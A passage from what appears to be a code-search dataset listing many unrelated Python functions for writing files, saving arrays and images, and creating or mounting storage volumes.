Path(filepath).suffix\n if extension.lower() in VIDEO_TYPES:\n video_writer = imageio.get_writer(filepath, macro_block_size=None)\n for slice in self.volume:\n slice = slice.astype(\"uint8\")\n video_writer.append_data(slice)\n video_writer.close()\n elif extension.lower() in IMAGE_TYPES:\n base = Path(filepath).stem\n print(\n \"Saving OCT as sequential slices {}_[1..{}]{}\".format(\n base, len(self.volume), extension\n )\n )\n full_base = Path(filepath).with_suffix(\"\")\n self.volume = np.array(self.volume).astype(\"float64\")\n self.volume *= 255.0 / self.volume.max()\n for index, slice in enumerate(self.volume):\n filename = \"{}_{}{}\".format(full_base, index, extension)\n cv2.imwrite(filename, slice)\n elif extension.lower() == \".npy\":\n np.save(filepath, self.volume)\n else:\n raise NotImplementedError(\n \"Saving with file extension {} not supported\".format(extension)\n )", "def _write(fdesc, data):\n while data:\n count = os.write(fdesc, data)\n data = data[count:]", "def write(self, fname):\n pass", "def add_file_or_directory_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt # type: Optional[Text]\n ):\n if not volume.resolved.startswith(\"_:\"):\n self._add_volume_binding(volume.resolved, volume.target) # this one defaults to read_only", "def update_volumes():\n print 'do something useful here'", "def write(self, file):\n #write header\n self.ID.write(file)\n if (self.write_size): \n self.size.write(file)\n for variable in self.variables:\n variable.write(file)\n for subchunk in self.subchunks:\n subchunk.write(file)", "def write_vectors(self, filename):\n svu.write_realvectors(self,filename)", "def writetofile(self,direction,value):\r\n output = str(\"{},{} \\n\".format(direction,value))\r\n self.new_file.write(output)", "def _save(self, name, content):\n full_path = self.path(name)\n with caches['default'].lock('{}_{}'.format(full_path, 'reader')):\n with caches['default'].lock('{}_{}'.format(full_path, 'writer')):\n if cache.islocked(full_path) is False:\n with cache.lock(full_path):\n cache.set(full_path, 'storage')\n try:\n directory = os.path.dirname(full_path)\n\n # Create any intermediate directories that do not exist.\n if self.__volume.exists(directory) is False:\n try:\n if self.directory_permissions_mode is not None:\n # os.makedirs applies the global umask, so we reset it,\n # for consistency with file_permissions_mode behavior.\n self.volume.makedirs(directory, self.directory_permissions_mode)\n else:\n self.volume.makedirs(directory)\n except FileNotFoundError:\n # There's a race between os.path.exists() and os.makedirs().\n # If os.makedirs() fails with FileNotFoundError, the directory\n # was created concurrently.\n pass\n if not os.path.isdir(directory):\n raise IOError(\"%s exists and is not a directory.\" % directory)\n\n # There's a potential race condition between get_available_name and\n # saving the file; it's possible that two threads might return the\n # same name, at which point all sorts of fun happens. So we need to\n # try to create the file, but if it already exists we have to go back\n # to get_available_name() and try again.\n\n while True:\n try:\n # This file has a file path that we can move.\n if hasattr(content, 'temporary_file_path'):\n file_move_safe(content.temporary_file_path(), full_path)\n\n # This is a normal uploadedfile that we can stream.\n else:\n # The current umask value is masked out by os.open!\n fd = self.__volume.open(full_path, self.OS_OPEN_FLAGS, 0o666)\n _file = None\n try:\n for chunk in content.chunks():\n if _file is None:\n _file = fd.dup()\n _file.write(chunk)\n finally:\n if _file is not None:\n _file.close()\n fd.close()\n except FileExistsError:\n # A new name is needed if the file exists.\n name = self.get_available_name(name)\n full_path = self.path(name)\n else:\n # OK, the file save worked. Break out of the loop.\n break\n\n if self.file_permissions_mode is not None:\n self.__volume.chmod(full_path, self.file_permissions_mode)\n finally:\n cache.delete(full_path)\n # Store filenames with forward slashes, even on Windows.\n return (True, name.replace('\\\\', '/'))\n return (False, cache.get(full_path))", "def write_data(filepath, container, ind=\"\\t\", is_sui=False, create_dirs=False, print_on_success=True):\n\n if create_dirs:\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n\n with open(filepath, mode=\"w\", encoding=\"utf8\", newline=\"\\r\\n\") as f:\n\n if not is_sui:\n f.write(\"SiiNunit\\n\")\n f.write(\"{\\n\")\n\n count = len(container)\n for i, unit in enumerate(container):\n _write_unit(f, unit, ind)\n\n if i < count - 1:\n f.write(\"\\n\")\n\n if not is_sui:\n f.write(\"}\\n\")\n\n if print_on_success:\n file_type = \"SUI\" if is_sui else \"SII\"\n lprint(\"I WRITTING %s FILE to: %r\", (file_type, filepath))\n\n return True", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n TAG_CHAR = b'PIEH'\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def write(self, filename):\n bvh_string = self.generate_bvh_string()\n if filename[-4:] == '.bvh':\n filename = filename\n else:\n filename = filename + '.bvh'\n with open(filename, 'w') as outfile:\n outfile.write(bvh_string)", "def put(self, filename, data, **kw):\n\n file_path = os.path.join(self.storage_path, filename)\n file_obj = open(file_path, \"w\")\n file_obj.write(data)", "def write(self, filename, data):\n raise NotImplementedError", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)", "def writable(path):", "def write(filename):\n print(uc.write(filename))", "def writeto(self, fileout):\n \n dump_pkl(self.data, fileout)", "def write_img_to_fs(name, data):\n with open(name, \"wb\") as fout:\n fout.write(data)", "def test_volumes_complex(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n volumes:\n /foo: /host/foo\n /bar:\n hostpath: /host/bar\n /snap:\n hostpath: /host/snap\n options: z,ro\n \"\"\"\n )\n\n config = scuba.config.load_config(\".scuba.yml\")\n vols = config.volumes\n assert len(vols) == 3\n\n v = vols[\"/foo\"]\n assert isinstance(v, scuba.config.ScubaVolume)\n assert v.container_path == \"/foo\"\n assert v.host_path == \"/host/foo\"\n assert v.options == []\n\n v = vols[\"/bar\"]\n assert isinstance(v, scuba.config.ScubaVolume)\n assert v.container_path == \"/bar\"\n assert v.host_path == \"/host/bar\"\n assert v.options == []\n\n v = vols[\"/snap\"]\n assert isinstance(v, scuba.config.ScubaVolume)\n assert v.container_path == \"/snap\"\n assert v.host_path == \"/host/snap\"\n assert v.options == [\"z\", \"ro\"]", "def _call_writeVec(vecObj, filename, mode):\n res = vecObj.writeVec(filename, mode)\n return res", "def write_to_file(info: List[str]) -> None:\n return", "def write(self, instream: typ.BinaryIO, filepath: str,\r\n filename: str = None) -> None:\r\n if filename is not None:\r\n filename = path.basename(filename)\r\n if self.fs_type == 'FAT':\r\n allocator_metadata = self.fs.write(instream, filepath)\r\n self.metadata.add_file(filename, allocator_metadata)\r\n elif self.fs_type == 'NTFS':\r\n allocator_metadata = self.fs.write(instream, filepath)\r\n self.metadata.add_file(filename, allocator_metadata)\r\n else:\r\n raise NotImplementedError()", "def write_to_disk(self):\n text_file = open(self.file_path, \"w\")\n text_file.write(str(self))\n text_file.close()\n # dump to pickle\n pickle.dump(self.blockchain, open(self.pickle_path, \"wb\"))", "def filewrite(self, filename):\n io.write(self, filename)", "def write(cls, file, data):\n file.write(data)", "def write(init_time, end_time, vpk, media, rms):\n global data_file\n\n # atualiza o arquivo de dados\n update()\n\n # Salva os dados no arquivo\n data_file.write(\n str(init_time) + ',' + str(end_time) + ',' +\n str(vpk) + ',' + str(media) + ',' + str(rms) + '\\n'\n )", "def __mount_ebs_volume( self ):\n ebs_volume_size = self.instance_tag( 'ebs_volume_size' ) or '0'\n ebs_volume_size = int( ebs_volume_size )\n if ebs_volume_size:\n instance_name = self.instance_tag( 'Name' )\n cluster_ordinal = int( self.instance_tag( 'cluster_ordinal' ) )\n volume_name = '%s__%d' % (instance_name, cluster_ordinal)\n volume = EC2VolumeHelper( ec2=self.ec2,\n availability_zone=self.availability_zone,\n name=volume_name,\n size=ebs_volume_size,\n volume_type=\"gp2\" )\n # TODO: handle case where volume is already attached\n device_ext = '/dev/sdf'\n device = '/dev/xvdf'\n volume.attach( self.instance_id, device_ext )\n\n # Wait for inode to appear and make sure its a block device\n while True:\n try:\n assert stat.S_ISBLK( os.stat( device ).st_mode )\n break\n except OSError as e:\n if e.errno == errno.ENOENT:\n time.sleep( 1 )\n else:\n raise\n\n # Only format empty volumes\n volume_label = volume_label_hash( volume_name )\n if check_output( [ 'file', '-sL', device ] ).strip( ) == device + ': data':\n check_call( [ 'mkfs', '-t', 'ext4', device ] )\n check_call( [ 'e2label', device, volume_label ] )\n else:\n # If the volume is not empty, verify the file system label\n actual_label = check_output( [ 'e2label', device ] ).strip( )\n if actual_label != volume_label:\n raise AssertionError(\n \"Expected volume label '%s' (derived from '%s') but got '%s'\" %\n (volume_label, volume_name, actual_label) )\n current_mount_point = self.__mount_point( device )\n if current_mount_point is None:\n mkdir_p( self.persistent_dir )\n check_call( [ 'mount', device, self.persistent_dir ] )\n elif current_mount_point == self.persistent_dir:\n pass\n else:\n raise RuntimeError(\n \"Can't mount device %s on '%s' since it is already mounted on '%s'\" % (\n device, self.persistent_dir, current_mount_point) )\n else:\n # No persistent volume is attached and the root volume is off limits, so we will need\n # to place persistent data on the ephemeral volume.\n self.persistent_dir = self.ephemeral_dir", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write_to_outfile(involume, outvolume, data, outfiles_partition, outdir_path, O, file_manager, addition, tracker):\n lowcorner, upcorner = get_overlap_subarray(involume, outvolume) # find subarray crossing both files in the basis of the original image\n overlap_vol = get_overlap_volume(involume, outvolume)\n overlap_shape = overlap_vol.get_shape()\n if DONT_WRITE:\n tracker.add_volume(overlap_vol)\n\n nb_outfile_seeks_tmp = 0\n s = overlap_shape\n if s[2] != O[2]:\n nb_outfile_seeks_tmp += s[0]*s[1]\n elif s[1] != O[1]:\n nb_outfile_seeks_tmp += s[0]\n elif s[0] != O[0]:\n nb_outfile_seeks_tmp += 1\n else:\n pass\n\n if DONT_WRITE:\n print(f\"Overlap shape: {overlap_shape}\")\n print(f\"Outfile shape: {O}\")\n print(f\"Number seeks: {nb_outfile_seeks_tmp}\")\n return overlap_shape, 0, nb_outfile_seeks_tmp\n\n slices = [(lowcorner[0], upcorner[0]), (lowcorner[1], upcorner[1]), (lowcorner[2], upcorner[2])]\n offset_in = involume.get_corners()[0] # lower corner\n offset_out = outvolume.get_corners()[0]\n\n slices_in_infile = [ # convert corners in the basis of input file\n (lowcorner[0]-offset_in[0], upcorner[0]-offset_in[0]), \n (lowcorner[1]-offset_in[1], upcorner[1]-offset_in[1]), \n (lowcorner[2]-offset_in[2], upcorner[2]-offset_in[2])]\n \n slices_in_outfile = [ # convert corners in the basis of output file\n (lowcorner[0]-offset_out[0], upcorner[0]-offset_out[0]), \n (lowcorner[1]-offset_out[1], upcorner[1]-offset_out[1]), \n (lowcorner[2]-offset_out[2], upcorner[2]-offset_out[2])]\n\n if DEBUG_LOCAL:\n logger.debug(f\"[debug] extracting {s[0][0]}:{s[0][1]}, {s[1][0]}:{s[1][1]}, {s[2][0]}:{s[2][1]} from input file\")\n logger.debug(f\"[debug] inserting {s2[0][0]}:{s2[0][1]}, {s2[1][0]}:{s2[1][1]}, {s2[2][0]}:{s2[2][1]} into output file {out_filename}\")\n\n s = slices_in_infile\n subarr_data = data[s[0][0]:s[0][1],s[1][0]:s[1][1],s[2][0]:s[2][1]] # extract subarr from input file's data \n\n _3d_pos = numeric_to_3d_pos(outvolume.index, outfiles_partition, order='C')\n i, j, k = _3d_pos\n\n if addition:\n subarr_data = subarr_data + 1\n\n global outdirs_dict, outdir_index\n\n if (i, j, k) in outdirs_dict.keys():\n outdir_path = outdirs_dict[(i, j, k)]\n print(f\"Writing at: {outdir_path}\")\n else:\n outdir_path = '/disk' + str(outdir_index) + '/gtimothee/output'\n outdirs_dict[(i, j, k)] = outdir_path\n outdir_index += 1\n if outdir_index == 6:\n outdir_index = 0\n\n print(f\"Writing at: {outdir_path}\")\n print(f\"Increasing writing index: {outdir_index}\")\n\n t2 = time.time()\n if not DONT_WRITE:\n file_manager.write_data(i, j, k, outdir_path, subarr_data, slices_in_outfile, O)\n t2 = time.time() - t2\n \n if DEBUG_LOCAL: \n file_manager.test_write(outfile_path, slices_in_outfile, subarr_data)\n\n return overlap_shape, t2, nb_outfile_seeks_tmp", "def write(self, filename, data):\n\t\t# create the path if it doesn't exists\n\t\tdir = os.path.dirname(filename)\n\t\tif not os.path.isdir(dir):\n\t\t\tos.mkdir(dir)\n\t\t\n\t\t# write data\n\t\tfile = codecs.open(filename, 'w', 'utf8')\n\t\tfile.write(data)\n\t\tfile.close()", "async def write_file(self, directory: str, name: str, file: bytes):\n pass", "def write_data():", "def save_inventory(file_name, table):\r\n with open(file_name, 'w') as objFile:\r\n for cd in table:\r\n objFile.write(cd.saveFormat())\r\n return table", "def write(self, out):", "def list_volumes(self):\n print '# Listing existing volumes'\n self.compute.list_volumes()", "def flow_write(filename,uv,v=None):\n TAG_CHAR = 'PIEH'\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def test_volumes_simple_volume(self):\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n volumes:\n /cpath: /hpath\n \"\"\"\n )\n\n config = scuba.config.load_config(\".scuba.yml\")\n assert len(config.volumes) == 1\n\n v = config.volumes[\"/cpath\"]\n assert v.container_path == \"/cpath\"\n assert v.host_path == \"/hpath\"", "def createLogicalVolume(self, vg, filesystem, name, mountpoint, size):\n lv = {}\n lv['command'] = 'create:logvol'\n lv['vg'] = vg\n lv['fs'] = filesystem\n lv['size'] = size - EXTENT_SIZE + 1\n lv['name'] = name\n lv['mountPoint'] = mountpoint\n lv['format'] = 'yes'\n\n return lv", "def save_to_file(content, song_name):\n file = open(\"./assets/homemade_partitions.txt\", \"a+\")\n # Move to the start of the file\n file.seek(0)\n # Read the total lines\n total_lines = len(file.readlines())\n # Move to the end of the file\n file.seek(0, 2)\n # Write the song's name\n file.write(f\"#{int(total_lines / 2 + 1)} {song_name}\\n\")\n # Write the song's partition\n file.write(content + \"\\n\")\n file.close()", "def write(self, file):\n #write header\n for variable in self.variables:\n variable.write(file)\n for subchunk in self.subchunks:\n subchunk.write(file)", "def write_file(self, filename):\n with open(filename, \"w\") as fo:\n # vertices\n\n for x, y, z in self.vertices:\n fo.write(\"v {} {} {}\\n\".format(x, y, z))\n logging.info(\"Wrote {} vertices\".format(len(self.vertices)))\n\n # faces\n faces = 0\n width, height = self.size\n for y in range(0, height-1):\n for x in range(0, width-1):\n tl = self.vertex_num(x,y)\n tr = tl + 1\n bl = tl + width\n br = bl + 1\n fo.write(\"f {} {} {}\\n\".format(tl, tr, bl))\n fo.write(\"f {} {} {}\\n\".format(tr, br, bl))\n faces += 2\n logging.info(\"Wrote {} tris\".format(faces))", "def write_aspera_secrets_to_disk():\n aspera_key_secret = get_secret_from_secrets_manager('ups-prod-aspera-key')\n aspera_file = open(\"/aspera/aspera.pk\", \"wb\")\n aspera_file.write(aspera_key_secret)\n aspera_file.flush()\n aspera_file.close()\n\n aspera_vcf_key_secret = get_secret_from_secrets_manager('ups-prod-aspera-vcf-key')\n aspera_vcf_file = open(\"/aspera/aspera_vcf.pk\", \"wb\")\n aspera_vcf_file.write(aspera_vcf_key_secret)\n aspera_vcf_file.flush()\n aspera_vcf_file.close()", "def write(self, path, **kwargs):\n client = self.connect(VAULT_TOKEN)\n client.write(path, **kwargs)", "def write(self, path, overwrite=False):\r\n\r\n self.data.write(path, format='ascii.fixed_width', delimiter='|', overwrite=overwrite)", "def write_content_to_file(\n vm_name, file_name, content=config.TEXT_CONTENT,\n vm_executor=None\n):\n command = ECHO_CMD % (content, file_name)\n return _run_cmd_on_remote_machine(vm_name, command, vm_executor)", "def create_volume(self, instance_id):\n user, instance = _get_user_and_instance(self.girder_client, instance_id)\n tale = self.girder_client.get('/tale/{taleId}'.format(**instance))\n\n self.job_manager.updateProgress(\n message='Creating volume', total=CREATE_VOLUME_STEP_TOTAL,\n current=1, forceFlush=True)\n\n vol_name = \"%s_%s_%s\" % (tale['_id'], user['login'], new_user(6))\n fs_sidecar = FSContainer.start_container(vol_name)\n payload = {\n \"mounts\": [\n {\n \"type\": \"data\",\n \"protocol\": \"girderfs\",\n \"location\": \"data\",\n },\n {\n \"type\": \"home\",\n \"protocol\": \"bind\",\n \"location\": \"home\",\n },\n {\n \"type\": \"workspace\",\n \"protocol\": \"bind\",\n \"location\": \"workspace\",\n },\n {\n \"type\": \"versions\",\n \"protocol\": \"girderfs\",\n \"location\": \"versions\",\n },\n {\n \"type\": \"runs\",\n \"protocol\": \"girderfs\",\n \"location\": \"runs\",\n },\n ],\n \"taleId\": tale[\"_id\"],\n \"userId\": user[\"_id\"],\n \"girderApiUrl\": GIRDER_API_URL,\n \"girderApiKey\": _get_api_key(self.girder_client),\n \"root\": vol_name,\n }\n FSContainer.mount(fs_sidecar, payload)\n self.job_manager.updateProgress(\n message='Volume created', total=CREATE_VOLUME_STEP_TOTAL,\n current=CREATE_VOLUME_STEP_TOTAL, forceFlush=True)\n print(\"WT Filesystem created successfully.\")\n\n cli = docker.from_env()\n return dict(\n nodeId=cli.info()['Swarm']['NodeID'],\n fscontainerId=fs_sidecar.id,\n volumeName=vol_name,\n instanceId=instance_id,\n taleId=tale[\"_id\"],\n )", "def write_to_binary_file(self, filename):\n\n self.octree.writeBinary(str.encode(filename))", "def write_block(self, index, block):\n writer = self.numbers_to_file(\n join(self.tempdir.name, BLOCK_FILE_NAME.format(index)))\n next(writer)\n for number in block:\n writer.send(number)\n writer.close()", "def write(file=None, dir=None, force=False):\n\n # Check the pipe setup.\n check_pipe_setup(sequence=True, j=True)\n\n # Open the file for writing.\n file = open_write_file(file, dir, force)\n\n # Loop over the interatomic data containers and collect the data.\n data = []\n for interatom in interatomic_loop():\n # Skip deselected containers.\n if not interatom.select:\n continue\n\n # Skip containers with no J coupling.\n if not hasattr(interatom, 'j_coupling'):\n continue\n\n # Append the spin data.\n data.append([])\n data[-1].append(interatom.spin_id1)\n data[-1].append(interatom.spin_id2)\n\n # The value.\n data[-1].append(repr(interatom.j_coupling))\n\n # The error.\n if hasattr(interatom, 'j_coupling_err'):\n data[-1].append(repr(interatom.j_coupling_err))\n else:\n data[-1].append(repr(None))\n\n # Write out.\n write_data(out=file, headings=[\"Spin_ID1\", \"Spin_ID2\", \"J coupling\", \"J coupling\"], data=data)", "def writeBlade(self):\n\n ofname = self.blade1_file ### note, assuming they're all the same\n ofh = open(ofname,'w')\n\n for line in self.lines_blade:\n ofh.write(line)\n ofh.close()", "def write_files(self, basedir):\n outdir = basedir / self.type\n outdir.mkdir(parents=True, exist_ok=True)\n\n for point, row in zip(self.points, self.array):\n filepath = outdir / point\n with filepath.open('w') as f:\n idx = 0\n for ikey in self.pardict.keys():\n f.write(\"{} {}\\n\".format(ikey, row[idx]))\n idx += 1\n logging.debug('wrote %s', filepath)", "def write_object_file_to_file(self, file_name):\n with open(file_name, 'wb+') as file:\n file.write(self.object_file.to_binary_array())", "def writeToFile(self):\n self.dto.writeToCsv()\n print(\"File written.\")", "def write_file(self, parser):\n # put an infinite loop at the end of the program\n if self.directory:\n # this means a path to a file was passed in\n if self.filename.endswith('.vm'):\n output_filename = '{directory}/{filename}{suffix}'.format(\n directory=self.directory,\n filename=self.basename,\n suffix=self.suffix\n )\n else:\n # this means a directory was passed in rather than a file\n output_filename = '{directory}/{filename}{suffix}'.format(\n directory=self.directory,\n filename=os.path.abspath(self.directory).split('/')[-1],\n suffix=self.suffix\n )\n\n else:\n # handle case of if . or .. is passed\n if not self.filename.endswith('.vm'):\n output_filename = '{directory}/{filename}{suffix}'.format(\n directory=self.filename,\n filename=os.path.abspath(self.abspath).split('/')[-1],\n suffix=self.suffix\n )\n else:\n # this means we are already in the directory of the file\n output_filename = '{filename}{suffix}'.format(\n filename=self.basename,\n suffix=self.suffix\n )\n with open('%s' % output_filename, 'w') as output_file:\n print('writing to {}'.format(output_filename))\n output_file.write('\\n'.join(parser.asm_commands_list))", "def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()", "def write(data):", "def write(self):\n if self.skip_bootloader: # pylint: disable=no-member\n return\n\n if self.update_only: # pylint: disable=no-member\n self.update()\n return\n\n try:\n os.sync()\n self.stage2_device.format.sync(root=util.getTargetPhysicalRoot()) # pylint: disable=no-member\n self.install()\n finally:\n self.write_config() # pylint: disable=no-member", "def crear_fs(raiz, nvol):\n if nvol == None:\n nvol = \"NUEVO_VOL\"\n size_nvol = len(nvol)\n if size_nvol < 15:\n sobrante_nvol = 15 - size_nvol\n with open(raiz,\"w+\") as f:\n f.write((\"\\x00\"*(512*1440)))\n filesys = mmap.mmap(f.fileno(),0)\n filesys[0:8] = \"FiUnamFS\".encode('ascii')\n filesys[10:13] = \"0.7\".encode('ascii')\n filesys[20:35] = str((\"0\"*sobrante_nvol)+nvol).encode('ascii')\n filesys[40:45] = \"00512\".encode('ascii')\n filesys[47:49] = \"04\".encode('ascii')\n filesys[52:60] = \"00001440\".encode('ascii')\n for i in range(64):\n self.escribir_indir(filesys,i)\n filesys[512*5:] = str(\"\\x00\"*(512*1435)).encode('ascii')\n f.close()", "def writeFlow(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def writefile(name, instream, start=None, end=None, append=False):", "def _write(self, what):\n\n for i in xrange(5):\n if self.use_disk:\n # Write what to disk\n self.outfile.write(what)\n else:\n # Write what to RAM\n a = what[:]\n if self.use_disk:\n self._sync()", "def write_file(self, directory, name, content):\n\n try:\n f = open(os.path.join(directory, name), 'w')\n f.write(content)\n f.close()\n except:\n print \"Content not written to file: %s\" % name", "def writeDataToFile(self):\n if self.data is not None:\n self.notify.debug('Data is now synced with disk at %s' % \\\n self.filepath)\n if self.wantAnyDbm:\n self.data.sync()\n else:\n try:\n backuppath = self.filepath+ '.bu'\n if os.path.exists(self.filepath):\n os.rename(self.filepath,backuppath)\n \n outfile = open(self.filepath, 'w')\n cPickle.dump(self.data,outfile)\n outfile.close()\n \n if os.path.exists(backuppath):\n os.remove(backuppath)\n except EnvironmentError:\n self.notify.warning(str(sys.exc_info()[1]))\n else:\n self.notify.warning('No data to write. Aborting sync.')", "def attach_volume(self, context, connection_info, instance, mountpoint,\n disk_bus=None, device_type=None, encryption=None):", "def fwrite(filename, text):\n basedir = os.path.dirname(filename)\n if not os.path.isdir(basedir):\n os.makedirs(basedir)\n\n with open(filename, 'w') as f:\n f.write(text)", "def create_volume_string(host_dir, container_dir, read_only = True):\n access = \"ro\" if read_only else \"rw\"\n return \":\".join([os.path.abspath(host_dir), container_dir, access])", "def __writeToFile(self, filePath, lst): \n \n if not self.outDir is None: \n filePath = os.path.join(self.outDir, filePath) \n \n open(filePath,'a').writelines(lst)", "def file_write(sp_length, sp_period, header, file_name):\n \n #specify filename and inform write\n out_file = open(file_name, \"w\")\n \n #add headers to file from list\n print(\"{0:>15}\".format(header[0]) ,\\\n \"{0:>15}\".format(header[1]) ,\\\n \"{0:>15}\".format(header[2]), file = out_file)\n \n #add data to file form lists \n for i in range(len(sp_length)):\n print(\"{0:>15}\".format(i) ,\\\n \"{0:>15.3f}\".format(sp_length[i]) ,\\\n \"{0:>15.3f}\".format(sp_period[i]), file = out_file)\n \n #close the file\n out_file.close()", "def test_volumes_null_volume_type(self):\n # NOTE: In the future, we might want to support this as a volume\n # (non-bindmount, e.g. '-v /somedata'), or as tmpfs\n with open(\".scuba.yml\", \"w\") as f:\n f.write(\n r\"\"\"\n image: na\n volumes:\n /bar:\n \"\"\"\n )\n\n self._invalid_config(\"hostpath\")", "def save(items, name, file):\n dirname = os.path.dirname(file)\n if not os.path.isdir(dirname):\n logging.debug(\"creating directory %s\", dirname)\n os.makedirs(dirname)\n f = r.TFile(file, \"RECREATE\")\n f.WriteObject(vectorize(items, \"roast::Process*\"), name)\n f.Close()", "def save_data_to_file(file_name, list_of_product_objects):\r\n try:\r\n objF = open(file_name, \"w\")\r\n for row in list_of_product_objects:\r\n objF.write(str(row[0]) + \",\" + str(row[1]) + \"\\n\")\r\n objF.close()\r\n except IOError:\r\n print(\"Unable to locate file\")", "def test_aws_service_api_volumes_post(self):\n pass", "def write_contents(self):\n dfile = open(os.path.join(self.directory, self.file_name), 'w')\n dfile.write(self.contents.strip())", "def write_file(file_name, table):\r\n \r\n savectr=len(table)\r\n try:\r\n with open (file_name, 'wb') as objFile:\r\n pickle.dump(table,objFile) #pickle my 2D list\r\n print ('{} CD(s) saved into {}.\\n'.format(savectr,file_name))\r\n except PermissionError as e:\r\n print('Not enough rights to create/modify ' + file_name + '.') #if unable pickle data due to permission issues\r\n print ()\r\n print (e, e.__doc__, sep='\\n')\r\n print ()\r\n except IOError as e:\r\n print ('I/O error({0}): {1}'.format(e.errno,e.strerror))#if unable to pickle data due to IO errors such as disk space issues\r\n print ()\r\n print (e, e.__doc__, sep='\\n')\r\n print ()\r\n except pickle.PickleError as e:\r\n print ('Unable to write data into ' + file_name + '.') #if unable to pickle 2D list, exception handling for pickling errors\r\n print ()\r\n print (e, e.__doc__, sep='\\n')\r\n print ()", "def write_binary(self, path):\n return", "def write( data ):", "def dump_blob(self, blob):\n path = os.path.join(self.rootpath, self.OBJECTPATH, blob.uuid[:2], blob.uuid[-2:]) + os.sep\n logging.debug(\"dump blob {}\".format(path))\n try:\n if not os.path.exists(path):\n os.makedirs(os.path.dirname(path), exist_ok=True)\n except OSError as exp:\n logging.error(\"Vault Error: {}\".format(exp))\n raise exp\n filepath = os.path.join(path, blob.uuid)\n blob.to_hdf5(filepath)\n # self.index.update_from_sdft(blob.metadata.sdft)\n self.index.update_from_metadata(blob.metadata)", "def create_block_file(blockTxns):\n textfile = open(\"/content/block.txt\", \"w\")\n for element in blockTxns:\n textfile.write(element + \"\\n\")\n textfile. close()", "def write_directories_to_file(output_file, directories):\n # print len(directories)\n file = open(output_file, 'w')\n print ('open file correctly' )\n for directory in directories:\n file.write(directory + '\\n')\n print ('No of lines has been written')\n print (len(directories) )\n file.close()", "def write_upload_files(self, appstruct):\n \n # Create the directory if it does not exist\n final_dir = \"thumbnails/%s\" % slugify(appstruct[\"serial\"])\n if not os.path.exists(final_dir):\n log.info(\"Make directory: %s\", final_dir)\n os.makedirs(final_dir)\n\n final_file = \"%s/uploaded.pdf\" % final_dir\n file_pointer = appstruct[\"pdf_upload\"][\"fp\"]\n self.single_file_write(file_pointer, final_file)", "def add_writable_directory_volume(self,\n runtime, # type: List[Text]\n volume, # type: MapperEnt\n host_outdir_tgt, # type: Optional[Text]\n tmpdir_prefix # type: Text\n ):\n if volume.resolved.startswith(\"_:\"):\n # Synthetic directory that needs creating first\n if not host_outdir_tgt:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n new_dir = os.path.join(\n tempfile.mkdtemp(dir=self.tmpdir),\n os.path.basename(volume.target))\n self._add_volume_binding(new_dir, volume.target, writable=True)\n elif not os.path.exists(host_outdir_tgt):\n log.debug('os.makedirs({}, 0o0755)'.format(host_outdir_tgt))\n os.makedirs(host_outdir_tgt, 0o0755)\n else:\n if self.inplace_update:\n self._add_volume_binding(volume.resolved, volume.target, writable=True)\n else:\n if not host_outdir_tgt:\n log.debug('tempfile.mkdtemp(dir={})'.format(self.tmpdir))\n tmpdir = tempfile.mkdtemp(dir=self.tmpdir)\n new_dir = os.path.join(\n tmpdir, os.path.basename(volume.resolved))\n log.debug('shutil.copytree({}, {})'.format(volume.resolved, new_dir))\n shutil.copytree(volume.resolved, new_dir)\n self._add_volume_binding(new_dir, volume.target, writable=True)\n else:\n log.debug('shutil.copytree({}, {})'.format(volume.resolved, host_outdir_tgt))\n shutil.copytree(volume.resolved, host_outdir_tgt)\n ensure_writable(host_outdir_tgt or new_dir)", "def write_to_file(file, name):\n with open(file, \"a\") as player_list:\n player_list.writelines(name)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def attach_volume(self, instance_name, device_path, mountpoint):\n return True", "def save_inventory(file_name, lst_Inventory):\r\n \r\n 